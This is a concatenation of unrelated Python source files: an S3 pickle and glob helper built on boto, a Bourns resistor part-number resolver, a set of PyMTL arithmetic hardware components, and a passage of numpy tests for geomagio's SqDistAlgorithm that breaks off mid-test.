##print(cred_info)
#S3 = boto.connect_s3(**cred_info)
# Region-scoped S3 connection; credentials come from boto's standard chain
# (environment variables populated below, or instance metadata).
S3 = boto.s3.connect_to_region('us-west-2')
# Scratch directory for temporary download/upload files; fall back to the
# current working directory if it cannot be created.
TMPDIR='/data/tmp'
try:
    if not os.path.isdir(TMPDIR):
        os.mkdir(TMPDIR)
except OSError:
    TMPDIR = os.getcwd()
#set up S3 environment variables
creds_path = os.path.join(os.path.expanduser('~'), '.aws/credentials')
if os.path.isfile(creds_path):
    with open(creds_path) as creds_in:
        # Lines look like "aws_access_key_id = XXXX"; skip section headers.
        creds_dict = dict([elt.strip().split(' = ') for elt in creds_in if ' = ' in elt])
        os.environ['AWS_ACCESS_KEY_ID'] = creds_dict['aws_access_key_id']
        os.environ['AWS_SECRET_ACCESS_KEY'] = creds_dict['aws_secret_access_key']
else:
    # Fix: the original message named /root/.aws although the path actually
    # checked is ~/.aws; also terminate the warning with a newline.
    sys.stderr.write('Warning: No AWS credentials found in ~/.aws directory.\n')
def parse_s3_url(s3_url):
    '''Parse out and return the bucket name and key path of an s3 url.

    Example: 's3://bucket/a/b' -> ('bucket', 'a/b').
    '''
    # Split at most three times: scheme, empty authority gap, bucket, rest.
    pieces = s3_url.split('/', 3)
    bucket_txt = pieces[2]
    key_txt = pieces[3] if len(pieces) > 3 else ''
    return bucket_txt, key_txt
def get_pickle_s3(bucketname, keyname):
    '''Get a pickled file from AWS S3.

    Downloads the object to a scratch file in TMPDIR and unpickles it from
    there; requester-pays buckets are supported via the request-payer header.
    '''
    bucket = S3.get_bucket(bucketname)
    key = bucket.get_key(keyname)
    with NamedTemporaryFile(dir=TMPDIR) as scratch:
        key.get_contents_to_file(scratch, headers={'x-amz-request-payer':'requester'})
        scratch.seek(0)
        obj = pickle.load(scratch)
    return obj
def set_pickle_s3(bucketname, keyname, obj):
    '''Pickle and write an object to AWS S3.

    Creates the bucket and the key if either does not exist yet; the upload
    goes through a scratch file with the requester-pays header set.
    '''
    try:
        bucket = S3.get_bucket(bucketname)
    except boto.exception.S3ResponseError:
        bucket = S3.create_bucket(bucketname)
    key = bucket.get_key(keyname)
    if key is None:
        key = bucket.new_key(keyname)
    with NamedTemporaryFile(dir=TMPDIR) as scratch:
        pickle.dump(obj, scratch)
        scratch.seek(0)
        key.set_contents_from_file(scratch, headers={'x-amz-request-payer':'requester'})
def glob_keys(bucketname, glob_str, just_names=False):
    '''Query keys for the specified bucket and return keys with
    names matching the glob string.
    '''
    bucket = S3.get_bucket(bucketname)
    levels = glob_str.split('/')
    top_listing = bucket.list(prefix=levels[0], delimiter='/')
    return glob_keys_helper(top_listing, levels, 0, just_names=just_names)
def glob_keys_helper(prefixes, glob_levels, level_idx, just_names=False):
    # Recursively walk the bucket one '/'-delimited level at a time,
    # fnmatch-ing the accumulated glob prefix against each listing entry.
    globbed = []
    for elt in prefixes:
        # Compare against the glob truncated to the current depth so a
        # directory prefix can match before its children are listed.
        if fnmatch.fnmatch(elt.name.rstrip('/'), '/'.join(glob_levels[:level_idx + 1]).rstrip('/')):
            if level_idx + 1 == len(glob_levels):
                # Deepest glob level: collect the match itself.
                if just_names is True:
                    key = elt.name
                else:
                    # Re-fetch as a full Key object (the listing may yield
                    # lightweight Prefix entries); skip when the fetch fails.
                    key = elt.bucket.get_key(elt.name)
                if key:
                    globbed.append(key)
            else:
                # Descend one level and recurse on the sub-listing.
                globbed.extend(glob_keys_helper(elt.bucket.list(prefix=elt.name, delimiter='/'),
                                                glob_levels,
                                                level_idx + 1, just_names=just_names))
    return globbed
def glob_buckets(glob_str):
    '''Find buckets with names matching the provided glob string.'''
    return [bucket for bucket in S3.get_all_buckets()
            if fnmatch.fnmatch(bucket.name, glob_str)]
|
from .common import *
from partname_resolver.components.resistor import Resistor
from partname_resolver.units.resistanceTolerance import Tolerance
from ..units.temperature import TemperatureRange
import re
from decimal import Decimal
# Series prefix -> human-readable series description.
series = {'CAT16': 'Concave Terminations',
          'CAY16': 'Convex Terminations',
          'CHV': 'Thick Film High Voltage Chip Resistors',
          'CR': 'Chip Resistor'}
# Tolerance letter -> resistance tolerance.
tolerance = {'F': Tolerance('1%'),
             'J': Tolerance('5%')}
# TCR letter -> temperature coefficient of resistance.
tcr = {'X': '100ppm/K',
       'W': '200ppm/K'}
# Packing letter -> packaging description.
packing = {'E': 'Unknown',
           'G': 'Paper Tape (10,000 pcs.) on 7-inch Plastic Reel'}
# Termination suffix -> plating description.
termination = {'LF': 'Tin-plated (RoHS compliant)'}
# Tolerance+element-count code -> EIA case size for each array series.
size_CAT16 = {'J2': '0606',
              'F4': '1206',
              'J4': '1206',
              'F8': '2406',
              'J8': '2406'}
# NOTE(review): 'J8' maps to '1506' here but '2406' for CAT16 -- verify
# against the Bourns CAY16 datasheet.
size_CAY16 = {'J2': '0606',
              'F4': '1206',
              'J4': '1206',
              'F8': '2406',
              'J8': '1506'}
size = {'CAT16': size_CAT16, 'CAY16': size_CAY16}
# Series prefix -> resolved component type.
resistor_type = {'CAT16': Resistor.Type.ThickFilmResistorArray,
                 'CAY16': Resistor.Type.ThickFilmResistorArray,
                 'CHV': Resistor.Type.ThickFilmResistor,
                 'CR': Resistor.Type.ThickFilmResistor}
# Case size -> rated power in watts (CHV series).
power = {'0201': Decimal('0.05'),
         '0603': Decimal('0.1'),
         '0805': Decimal('0.125'),
         '1206': Decimal('0.25'),
         '2010': Decimal('0.5'),
         '2512': Decimal('1')}
# Case size -> maximum working voltage (CHV series).
maximum_working_voltage = {'0201': '25V',
                           '0603': '200V',
                           '0805': '400V',
                           '1206': '800V',
                           '2010': '2000V',
                           '2512': '3000V'}
# Series prefix -> rated operating temperature range.
working_temperature_range = {'CAT16': TemperatureRange(Decimal('-55'), Decimal('125')),
                             'CAY16': TemperatureRange(Decimal('-55'), Decimal('125')),
                             'CHV': TemperatureRange(Decimal('-55'), Decimal('155')),
                             'CR': TemperatureRange(Decimal('-55'), Decimal('125'))}
def build_regexpr_CHV():
    """Build the part-number regex for the CHV high-voltage chip series.

    Group numbers (consumed by decode_match_CHV):
      1 series, 2 size, 3 '-', 4 tolerance, 5 TCR, 6 '-', 7 resistance,
      8 packing, 9 termination (the trailing '?' makes it optional).
    """
    series_group = '(CHV)'  # 1
    size_group = '(0201|0603|0805|1206|2010|2512)'  # 2
    separator = '(-)'  # 3
    tolerance_group = build_group(tolerance)  # 4
    tcr_group = build_group(tcr)  # 5
    separator2 = '(-)'  # 6
    # Resistance code: 3-4 digits, or digits with 'R' marking the decimal
    # point. Fix: the original pattern ended in a stray ']' which forced the
    # xRx alternative to require a literal ']' character; raw string avoids
    # invalid '\d' escape warnings.
    resistance_group = r'(\d{3,4}|\d{2}R|\d{1}R\d{1})'  # 7
    packing_group = build_group(packing)  # 8
    termination_group = build_group(termination)  # 9
    return series_group + size_group + separator + tolerance_group + tcr_group + separator2 + resistance_group + \
        packing_group + termination_group + '?'
def decode_match_CHV(match):
    """Translate a CHV part-number regex match into a Resistor object.

    Group layout comes from build_regexpr_CHV: 1 series, 2 size,
    4 tolerance, 5 TCR, 7 resistance code, 8 packing, 9 termination.
    """
    # Free-text note combines the series description, TCR, plating and
    # packing information.
    note = series[match.group(1)] + ", TCR=" + tcr[match.group(5)] + ", " + termination[match.group(9)] +\
           ", Packing: " + packing[match.group(8)]
    # Power and voltage ratings are looked up by case size (group 2).
    return Resistor(resistor_type=resistor_type[match.group(1)],
                    manufacturer="Bourns",
                    partnumber=match.group(1) + match.group(2) + match.group(3) + match.group(4) + match.group(
                        5) + match.group(6) + match.group(7) + match.group(8) + match.group(9),
                    working_temperature_range=working_temperature_range[match.group(1)],
                    series=match.group(1),
                    resistance=resistance_string_to_ohm(match.group(7)),
                    power=power[match.group(2)],
                    max_working_voltage=maximum_working_voltage[match.group(2)],
                    tolerance=tolerance[match.group(4)],
                    case=match.group(2),
                    note=note)
def build_regexpr():
    """Build the part-number regex for the CAT16/CAY16/CR style numbers.

    Group numbers (consumed by decode_match): 1 series, 2 '-',
    3 resistance, 4 tolerance, 5 resistor count, 6 termination (optional).
    """
    series_group = build_group(series)  # 1
    separator = '(-)'  # 2
    # Resistance code: 3 digits, or digits with 'R' marking the decimal
    # point. Fix: the original pattern ended in a stray ']' which forced the
    # xRx alternative to require a literal ']' character; raw string avoids
    # invalid '\d' escape warnings.
    resistance_group = r'(\d{3}|\d{2}R|\d{1}R\d{1})'  # 3
    tolerance_group = build_group(tolerance)  # 4
    resistors_group = '(2|4|8)'  # 5
    termination_group = build_group(termination)  # 6
    return series_group + separator + resistance_group + tolerance_group + resistors_group + termination_group + '?'
def decode_match(match):
    """Translate a CAT16/CAY16/CR part-number regex match into a Resistor.

    Group layout comes from build_regexpr: 1 series, 3 resistance code,
    4 tolerance, 5 resistor count, 6 termination. Power and maximum working
    voltage are special-cased on the tolerance+count code -- TODO confirm
    these ratings against the Bourns datasheet.
    """
    return Resistor(resistor_type=resistor_type[match.group(1)],
                    manufacturer="Bourns",
                    partnumber=match.group(1) + match.group(2) + match.group(3) + match.group(4) + match.group(
                        5) + match.group(6),
                    working_temperature_range=working_temperature_range[match.group(1)],
                    series=match.group(1),
                    resistance=resistance_string_to_ohm(match.group(3)),
                    power=Decimal('0.125') if match.group(4) + match.group(5) == "J2" else Decimal('0.25'),
                    max_working_voltage='25V' if match.group(1) + match.group(4) + match.group(
                        5) == "CAY16J8" else '50V',
                    tolerance=tolerance[match.group(4)],
                    case=size[match.group(1)][match.group(4) + match.group(5)],
                    note=series[match.group(1)])
def resolve(partname):
    """Decode a Bourns part number into a Resistor, or None when unmatched.

    Tries the array/chip pattern first, then the CHV high-voltage pattern.
    """
    for build_pattern, decode in ((build_regexpr, decode_match),
                                  (build_regexpr_CHV, decode_match_CHV)):
        match = re.match(build_pattern(), partname)
        if match:
            return decode(match)
|
<gh_stars>100-1000
#=======================================================================
# arith.py
#=======================================================================
'''Collection of translatable arithmetic components.'''
from pymtl import *
#-----------------------------------------------------------------------
# Adder
#-----------------------------------------------------------------------
class Adder( Model ):
  """nbits-wide adder with carry-in and carry-out.

  The sum is formed in an (nbits+1)-wide temporary; the low nbits drive
  out and the top bit drives cout. Logic is left untouched because the
  @s.combinational body is parsed by PyMTL's translator.
  """
  def __init__( s, nbits = 1 ):
    s.in0 = InPort ( nbits )
    s.in1 = InPort ( nbits )
    s.cin = InPort ( 1 )
    s.out = OutPort ( nbits )
    s.cout = OutPort ( 1 )
    # Wires
    twidth = nbits + 1
    s.temp = Wire( twidth )
    # Connections
    s.connect( s.out, s.temp[0:nbits] )
    s.connect( s.cout, s.temp[nbits] )
    @s.combinational
    def comb_logic():
      # Zero extend the inputs by one bit so we can generate an extra
      # carry out bit
      t0 = zext( s.in0, twidth )
      t1 = zext( s.in1, twidth )
      s.temp.value = t0 + t1 + s.cin
  def line_trace( s ):
    # "<in0> <in1> <cin> () <out> <cout>"
    return "{} {} {} () {} {}" \
      .format( s.in0, s.in1, s.cin, s.out, s.cout )
#-----------------------------------------------------------------------
# Subtractor
#-----------------------------------------------------------------------
class Subtractor( Model ):
  """nbits-wide combinational subtractor: out = in0 - in1."""
  def __init__( s, nbits = 1 ):
    s.in0 = InPort ( nbits )
    s.in1 = InPort ( nbits )
    s.out = OutPort ( nbits )
    @s.combinational
    def comb_logic():
      s.out.value = s.in0 - s.in1
  def line_trace( s ):
    return "{} {} () {}".format( s.in0, s.in1, s.out )
#-----------------------------------------------------------------------
# Incrementer
#-----------------------------------------------------------------------
class Incrementer( Model ):
  """Adds a fixed elaboration-time constant to the input: out = in_ + increment_amount."""
  def __init__( s, nbits = 1, increment_amount = 1 ):
    s.in_ = InPort ( nbits )
    s.out = OutPort ( nbits )
    @s.combinational
    def comb_logic():
      s.out.value = s.in_ + increment_amount
  def line_trace( s ):
    return "{} () {}".format( s.in_, s.out )
#-----------------------------------------------------------------------
# ZeroExtender
#-----------------------------------------------------------------------
class ZeroExtender( Model ):
  """Zero-extends in_ from in_nbits to out_nbits."""
  def __init__( s, in_nbits = 1, out_nbits = 1 ):
    s.in_ = InPort ( in_nbits )
    s.out = OutPort ( out_nbits )
    @s.combinational
    def comb_logic():
      s.out.value = zext( s.in_, out_nbits )
  def line_trace( s ):
    return "{} () {}".format( s.in_, s.out )
#-----------------------------------------------------------------------
# SignExtender
#-----------------------------------------------------------------------
class SignExtender( Model ):
  """Sign-extends in_ from in_nbits to out_nbits (requires in_nbits <= out_nbits)."""
  def __init__( s, in_nbits = 1, out_nbits = 1 ):
    # Narrowing would silently truncate; reject it at elaboration time.
    assert in_nbits <= out_nbits
    s.in_ = InPort ( in_nbits )
    s.out = OutPort ( out_nbits )
    @s.combinational
    def comb_logic():
      s.out.value = sext( s.in_, out_nbits )
  def line_trace( s ):
    return "{} () {}".format( s.in_, s.out )
#-----------------------------------------------------------------------
# Zero Comparator
#-----------------------------------------------------------------------
class ZeroComparator( Model ):
  """One-bit output asserted when in_ equals zero."""
  def __init__( s, nbits = 1 ):
    s.in_ = InPort ( nbits )
    s.out = OutPort ( 1 )
    @s.combinational
    def comb_logic():
      s.out.value = s.in_ == 0
  def line_trace( s ):
    return "{} () {}".format( s.in_, s.out )
#-----------------------------------------------------------------------
# Equal Comparator
#-----------------------------------------------------------------------
class EqComparator( Model ):
  """One-bit output asserted when in0 == in1."""
  def __init__( s, nbits = 1 ):
    s.in0 = InPort ( nbits )
    s.in1 = InPort ( nbits )
    s.out = OutPort ( 1 )
    @s.combinational
    def comb_logic():
      s.out.value = s.in0 == s.in1
  def line_trace( s ):
    return "{} {} () {}".format( s.in0, s.in1, s.out )
#-----------------------------------------------------------------------
# Less-Than Comparator
#-----------------------------------------------------------------------
class LtComparator( Model ):
  """One-bit output asserted when in0 < in1 (unsigned Bits comparison)."""
  def __init__( s, nbits = 1 ):
    s.in0 = InPort ( nbits )
    s.in1 = InPort ( nbits )
    s.out = OutPort ( 1 )
    @s.combinational
    def comb_logic():
      s.out.value = s.in0 < s.in1
  def line_trace( s ):
    return "{} {} () {}".format( s.in0, s.in1, s.out )
#-----------------------------------------------------------------------
# Greater-Than Comparator
#-----------------------------------------------------------------------
class GtComparator( Model ):
  """One-bit output asserted when in0 > in1 (unsigned Bits comparison)."""
  def __init__( s, nbits = 1 ):
    s.in0 = InPort ( nbits )
    s.in1 = InPort ( nbits )
    s.out = OutPort ( 1 )
    @s.combinational
    def comb_logic():
      s.out.value = s.in0 > s.in1
  def line_trace( s ):
    return "{} {} () {}".format( s.in0, s.in1, s.out )
#-----------------------------------------------------------------------
# SignUnit
#-----------------------------------------------------------------------
class SignUnit( Model ):
  """Two's-complement negation: out = -in_ (computed as ~in_ + 1)."""
  def __init__( s, nbits = 1 ):
    s.in_ = InPort ( nbits )
    s.out = OutPort ( nbits )
    @s.combinational
    def comb_logic():
      s.out.value = ~s.in_ + 1
  def line_trace( s ):
    return "{} () {}".format( s.in_, s.out )
#-----------------------------------------------------------------------
# UnsignUnit
#-----------------------------------------------------------------------
class UnsignUnit( Model ):
  """Absolute-value unit: outputs the two's-complement magnitude of in_.

  If the sign bit of in_ is set the output is the negation (~in_ + 1),
  otherwise in_ passes through unchanged.
  """
  # Fix: default nbits to 1 for consistency with every other model in this
  # file; existing callers that pass nbits explicitly are unaffected.
  def __init__( s, nbits = 1 ):
    s.in_ = InPort ( nbits )
    s.out = OutPort ( nbits )
    @s.combinational
    def comb_logic():
      if s.in_[nbits-1]:
        s.out.value = ~s.in_ + 1
      else:
        s.out.value = s.in_
  def line_trace( s ):
    return "{} () {}".format( s.in_, s.out )
#-----------------------------------------------------------------------
# LeftLogicalShifter
#-----------------------------------------------------------------------
class LeftLogicalShifter( Model ):
  """Logical left shift: out = in_ << shamt."""
  def __init__( s, inout_nbits = 1, shamt_nbits = 1 ):
    s.in_ = InPort ( inout_nbits )
    s.shamt = InPort ( shamt_nbits )
    s.out = OutPort ( inout_nbits )
    @s.combinational
    def comb_logic():
      s.out.value = s.in_ << s.shamt
  def line_trace( s ):
    return "{} {} () {}".format( s.in_, s.shamt, s.out )
#-----------------------------------------------------------------------
# RightLogicalShifter
#-----------------------------------------------------------------------
class RightLogicalShifter( Model ):
  """Logical right shift: out = in_ >> shamt."""
  def __init__( s, inout_nbits = 1, shamt_nbits = 1 ):
    s.in_ = InPort ( inout_nbits )
    s.shamt = InPort ( shamt_nbits )
    s.out = OutPort ( inout_nbits )
    @s.combinational
    def comb_logic():
      s.out.value = s.in_ >> s.shamt
  def line_trace( s ):
    return "{} {} () {}".format( s.in_, s.shamt, s.out )
|
from geomagio.algorithm import SqDistAlgorithm as sq
import numpy as np
from numpy.testing import (
assert_allclose,
assert_almost_equal,
assert_array_less,
assert_equal,
)
def test_sqdistalgorithm_additive1():
    """SqDistAlgorithm_test.test_sqdistalgorithm_additive1()

    Uses a simple 12 point data series to compare additive inputs with
    corresponding outputs.

    Exercises sq.additive() in five configurations: zero-step prediction
    with trendline-only then seasonal-only uncertainty growth, followed by
    smoothing of zero-valued and sinusoidal observations with one free
    smoothing component at a time.
    """
    # configure to test zero-step predictions of 4 "season" cycles
    m = 4
    t = np.linspace(0, 2 * np.pi, m + 1)[:-1]
    hstep = 0
    # initial slope is 0; average age is infinite
    b0 = 0
    beta = 1 / np.inf
    # initial trendline is 0; average age is 12 steps
    l0 = 0
    alpha = 1 / 12.0
    # initial seasonal correction is sinusoid; average age is 12 steps
    s0 = np.sin(t)[0:4]
    gamma = 1 / 12.0 * m
    # standard deviation of unit-amplitude sinusoid
    sigma0 = [np.sqrt(0.5)]
    # predict three cycles ahead given l0 and s0, no inputs,
    # and assume PI only grows with trendline adjustments
    # (all-NaN observations make additive() run in pure-prediction mode)
    yobs1 = np.zeros(12) * np.nan
    yhat1, shat1, sighat1, _, _, _, _, _ = sq.additive(
        yobs1,
        m,
        alpha=alpha,
        beta=beta,
        gamma=0,
        s0=s0,
        l0=l0,
        b0=b0,
        sigma0=sigma0,
        hstep=hstep,
    )
    assert_almost_equal(
        yhat1,
        [0, 1, 0, -1, 0, 1, 0, -1, 0, 1, 0, -1],
        err_msg="yhat1 should almost equal simple time series",
    )
    assert_almost_equal(
        shat1,
        [0, 1, 0, -1, 0, 1, 0, -1, 0, 1, 0, -1],
        err_msg="shat1 should almost equal simple time series",
    )
    assert_almost_equal(
        sighat1,
        [
            0.70710678,
            0.70955777,
            0.71200031,
            0.71443451,
            0.71686044,
            0.71927819,
            0.72168784,
            0.72408947,
            0.72648316,
            0.72886899,
            0.73124703,
            0.73361737,
        ],
        err_msg="sighat1 should almost equal simple time series",
    )
    # predict three cycles ahead given l0 and s0, no inputs,
    # and assume PI only grows with seasonal adjustments
    yobs1 = np.zeros(12) * np.nan
    yhat1, shat1, sighat1, _, _, _, _, _ = sq.additive(
        yobs1,
        m,
        alpha=0,
        beta=0,
        gamma=gamma,
        s0=s0,
        l0=0,
        b0=0,
        sigma0=sigma0,
        hstep=hstep,
    )
    assert_almost_equal(
        yhat1,
        [0, 1, 0, -1, 0, 1, 0, -1, 0, 1, 0, -1],
        err_msg="yhat1 should almost equal simple time series, 2nd run",
    )
    assert_almost_equal(
        shat1,
        [0, 1, 0, -1, 0, 1, 0, -1, 0, 1, 0, -1],
        err_msg="shat1 should almost equal simple time series, 2nd run",
    )
    # note the step increase in sigma once per season (every m=4 samples)
    assert_almost_equal(
        sighat1,
        [
            0.70710678,
            0.70710678,
            0.70710678,
            0.70710678,
            0.74535599,
            0.74535599,
            0.74535599,
            0.74535599,
            0.78173596,
            0.78173596,
            0.78173596,
            0.78173596,
        ],
        err_msg="sighat1 should almost equal simple time series, 2nd run",
    )
    # smooth three cycles' worth of zero-value input observations,
    # assuming only the trendline varies
    yobs1 = np.zeros(12)
    yhat1, shat1, sighat1, _, _, _, _, _ = sq.additive(
        yobs1,
        m,
        alpha=alpha,
        beta=0,
        gamma=0,
        s0=s0,
        l0=0,
        b0=0,
        sigma0=sigma0,
        hstep=hstep,
    )
    # check output
    assert_almost_equal(
        yhat1,
        [
            0,
            1,
            -0.08333333,
            -1.07638889,
            0.01331019,
            1.01220100,
            -0.07214908,
            -1.06613666,
            0.02270806,
            1.02081573,
            -0.06425225,
            -1.0588979,
        ],
        8,
        err_msg="yhat1 should almost equal simple time series, 3rd run",
    )
    assert_almost_equal(
        shat1,
        [0, 1, 0, -1, 0, 1, 0, -1, 0, 1, 0, -1],
        8,
        err_msg="shat1 should almost equal simple time series, 3rd run",
    )
    assert_almost_equal(
        sighat1,
        [
            0.64818122,
            0.67749945,
            0.62798561,
            0.66535255,
            0.61101568,
            0.64444779,
            0.59675623,
            0.63587127,
            0.58477433,
            0.62111112,
            0.57470621,
            0.61505552,
        ],
        8,
        err_msg="sighat1 should almost equal simple time series, 3rd run",
    )
    # smooth three cycles' worth of zero-value input observations,
    # assuming only the seasonal adjustments vary
    yobs1 = np.zeros(12)
    yhat1, shat1, sighat1, _, _, _, _, _ = sq.additive(
        yobs1,
        m,
        alpha=0,
        beta=0,
        gamma=gamma,
        s0=s0,
        l0=0,
        b0=0,
        sigma0=sigma0,
        hstep=hstep,
    )
    # check output: seasonal amplitude decays toward the zero observations
    assert_almost_equal(
        yhat1,
        [0, 1, 0, -1, 0, 0.66666667, 0, -0.66666667, 0, 0.44444444, 0, -0.44444444],
        8,
        err_msg="yhat1 should almost equal simple time series, 4th run",
    )
    assert_almost_equal(
        shat1,
        [
            0,
            1,
            0.08333333,
            -0.91666667,
            0,
            0.66666667,
            0.05555556,
            -0.61111111,
            0,
            0.44444444,
            0.03703704,
            -0.40740741,
        ],
        8,
        err_msg="shat1 should almost equal simple time series, 4th run",
    )
    assert_almost_equal(
        sighat1,
        [
            0.70710678,
            0.70710678,
            0.70710678,
            0.70710678,
            0.70710678,
            0.70710678,
            0.70710678,
            0.70710678,
            0.70710678,
            0.70710678,
            0.70710678,
            0.70710678,
        ],
        8,
        err_msg="sighat1 should almost equal simple time series, 4th run",
    )
    # smooth three cycles' worth of sinusoid input observations,
    # assuming only the seasonal adjustments vary, starting at zero
    yobs1 = np.concatenate((s0, s0, s0))
    yhat1, shat1, sighat1, _, _, _, _, _ = sq.additive(
        yobs1,
        m,
        alpha=0,
        beta=0,
        gamma=gamma,
        s0=s0 * 0,
        l0=0,
        b0=0,
        sigma0=sigma0,
        hstep=hstep,
    )
    # check output: seasonal amplitude grows toward the sinusoid observations
    assert_almost_equal(
        yhat1,
        [0, 0, 0, 0, 0, 0.33333333, 0, -0.33333333, 0, 0.55555556, 0, -0.55555556],
        8,
        err_msg="yhat1 should almost equal simple time series, 5th run",
    )
    # NOTE(review): 0.55555555 below (vs 0.55555556 above) is likely a
    # truncated digit in the expected data; assert_almost_equal at 8
    # decimal places tolerates it.
    assert_almost_equal(
        shat1,
        [
            0,
            0,
            -0.08333333,
            -0.08333333,
            0,
            0.33333333,
            -0.05555556,
            -0.38888889,
            0,
            0.55555555,
            -0.03703704,
            -0.59259259,
        ],
        8,
        err_msg="shat1 should almost equal simple time series, 5th run",
    )
    assert_almost_equal(
        sighat1,
        [
            0.70710678,
            0.70710678,
            0.70710678,
            0.70710678,
            0.70710678,
            0.70710678,
            0.70710678,
            0.70710678,
            0.70710678,
            0.70710678,
            0.70710678,
            0.70710678,
        ],
        8,
        err_msg="sighat1 should almost equal simple time series, 5th run",
    )
def test_sqdistalgorithm_additive2():
    """SqDistAlgorithm_test.test_sqdistalgorithm_additive2()

    Uses synthetic data time series over 300 days to test additive method
    outputs.

    Runs sq.additive() over six consecutive 50-"day" segments, threading
    the returned state (yhat0/l0/b0/s0/sigma0) from each call into the
    next, and checks max/min/mean statistics plus convergence behavior.
    """
    # set up smoothing parameters
    m = 100  # length of "day"
    alpha = 1.0 / 100.0 / 3.0  # average age of level is 3 "days"
    beta = 0  # slope doesn't change
    gamma = 1.0 / 100.0 * 100.0 / 3.0  # average age of "seasonal" correction
    phi = 1  # don't dampen the slope
    # initialize states for smoother
    l0 = None  # this uses the default initial level
    b0 = 0  # this is NOT the default initial slope
    s0 = None  # this uses default initial "seasonal" correction
    sigma0 = [0]  # this is NOT the default initial standard deviation
    # create first 50 "days" at 100 samples per synthetic "day", 0-50
    t000to050 = np.arange(5001)
    syn000to050 = 10.0 * np.sin(t000to050 * (2 * np.pi) / 100.0)
    # these are the old "defaults" computed when l0, b0, and s0 were None
    # NOTE(review): the 1440-sample window for l0 does not match the
    # m=100 "day" length used elsewhere -- presumably inherited from the
    # minutes-per-day default; confirm intent.
    l0 = np.nanmean(syn000to050[0:1440])
    b0 = (np.nanmean(syn000to050[m : 2 * m]) - np.nanmean(syn000to050[0:m])) / m
    s0 = [syn000to050[i] - l0 for i in range(m)]
    # run additive method on first 50 "days"
    (
        synHat000to050,
        sHat000to050,
        sigma000to050,
        syn050,
        s050,
        l050,
        b050,
        sigma050,
    ) = sq.additive(
        syn000to050,
        m,
        alpha,
        beta,
        gamma,
        phi,
        yhat0=None,
        s0=s0,
        l0=l0,
        b0=b0,
        sigma0=sigma0,
    )
    # The output should track the input exactly on this simple series
    # NOTE(review): .all() reduces each array to a single boolean before
    # comparison, so this asserts truthiness equality, not elementwise
    # equality -- much weaker than the comment implies.
    assert_equal(
        synHat000to050.all(),
        syn000to050.all(),
        "Output of additive should match simple sinusoid exactly",
    )
    # Check max, min and average
    assert_almost_equal(
        np.amax(synHat000to050), 10, 8, "Additive output should have a max of 10.0"
    )
    assert_almost_equal(
        np.amin(synHat000to050), -10, 8, "Additive output should have a min of -10.0"
    )
    assert_almost_equal(
        np.mean(synHat000to050), 0, 8, "Additive output should have average of 0"
    )
    # create 2nd set of 50 "days", 50-100 (same sinusoid, shifted up by 20)
    t050to100 = np.arange(5001, 10001)
    syn050to100 = 20 + 10.0 * np.sin(t050to100 * (2 * np.pi) / 100.0)
    # run additive method on next 50 "days"
    (
        synHat050to100,
        sHat050to100,
        sigma050to100,
        syn100,
        s100,
        l100,
        b100,
        sigma100,
    ) = sq.additive(
        syn050to100,
        m,
        alpha,
        beta,
        gamma,
        phi,
        yhat0=syn050,
        s0=s050,
        l0=l050,
        b0=b050,
        sigma0=sigma050,
    )
    # Check max, min and average
    assert_almost_equal(
        np.amax(synHat050to100), 30, 6, "Additive output should have a max of 30.0"
    )
    assert_almost_equal(
        np.amin(synHat050to100),
        -8.81753802428088,
        8,
        "Additive output should have a min of -8.81753...",
    )
    assert_almost_equal(
        np.mean(synHat050to100),
        19.17899833054862,
        8,
        "Additive output should have average of 19.17899...",
    )
    # the initial part of the computed series is catching up to the synthetic
    assert_array_less(
        synHat050to100[:555],
        syn050to100[:555],
        "Output of additive should begin below synthetic data",
    )
    # short section where the series' swap places
    assert_array_less(syn050to100[555:576], synHat050to100[555:576])
    # they swap back
    assert_array_less(synHat050to100[576:655], syn050to100[576:655])
    # swap again
    assert_array_less(syn050to100[655:689], synHat050to100[655:689])
    # after the initial lag and swaps, the series' get closer and closer
    assert_allclose(
        syn050to100[475:],
        synHat050to100[475:],
        rtol=1e-1,
        err_msg="Additive output should trend toward synthetic data, 1e-1",
    )
    assert_allclose(
        syn050to100[955:],
        synHat050to100[955:],
        rtol=1e-2,
        err_msg="Additive output should trend toward synthetic data, 1e-2",
    )
    assert_allclose(
        syn050to100[1500:],
        synHat050to100[1500:],
        rtol=1e-3,
        err_msg="Additive output should trend toward synthetic data, 1e-3",
    )
    assert_allclose(
        syn050to100[2100:],
        synHat050to100[2100:],
        rtol=1e-4,
        err_msg="Additive output should trend toward synthetic data, 1e-4",
    )
    assert_allclose(
        syn050to100[2700:],
        synHat050to100[2700:],
        rtol=1e-5,
        err_msg="Additive output should trend toward synthetic data, 1e-5",
    )
    assert_allclose(
        syn050to100[3300:],
        synHat050to100[3300:],
        rtol=1e-6,
        err_msg="Additive output should track synthetic data, 1e-6: 50-100",
    )
    # create 3rd set of 50 "days", 100-150 (adds a slow 50-"day" oscillation)
    t100to150 = np.arange(10001, 15001)
    syn100to150 = (
        20
        + 10.0 * np.sin(t100to150 * (2 * np.pi) / 100.0)
        + 20 * np.sin(t100to150 * (2 * np.pi) / 5000.0)
    )
    # run the additive method on the 3rd set of 50 "days"
    (
        synHat100to150,
        sHat100to150,
        sigma100to150,
        syn150,
        s150,
        l150,
        b150,
        sigma150,
    ) = sq.additive(
        syn100to150,
        m,
        alpha,
        beta,
        gamma,
        phi,
        yhat0=syn100,
        l0=l100,
        b0=b100,
        s0=s100,
        sigma0=sigma100,
    )
    # Check max, min and average
    assert_almost_equal(
        np.amax(synHat100to150),
        49.758884882080558,
        8,
        "Additive output should have a max of 49.75888...",
    )
    assert_almost_equal(
        np.amin(synHat100to150),
        -9.7579516919427647,
        8,
        "Additive output should have a min of -9.7579...",
    )
    assert_almost_equal(
        np.mean(synHat100to150),
        20.059589538984323,
        8,
        "Additive output should have average of 20.0595...",
    )
    # A couple of sections run pretty close together here
    assert_allclose(
        syn100to150[800:1900],
        synHat100to150[800:1900],
        rtol=1e-1,
        err_msg="Additive output should track synthetic data: day 100-150",
    )
    # create 4th set of 50 "days", 150-200 (amplitude-modulated sinusoid)
    t150to200 = np.arange(15001, 20001)
    syn150to200 = 20 + (10.0 * np.sin(t150to200 * (2 * np.pi) / 100.0)) * (
        1 * np.cos(t150to200 * (2 * np.pi) / 5000.0)
    )
    # run the additive method on the 4th set of 50 "days"
    (
        synHat150to200,
        sHat150to200,
        sigma150to200,
        syn200,
        s200,
        l200,
        b200,
        sigma200,
    ) = sq.additive(
        syn150to200,
        m,
        alpha,
        beta,
        gamma,
        phi,
        yhat0=syn150,
        l0=l150,
        b0=b150,
        s0=s150,
        sigma0=sigma150,
    )
    # Check max, min and average
    assert_almost_equal(
        np.amax(synHat150to200),
        29.573654766341747,
        8,
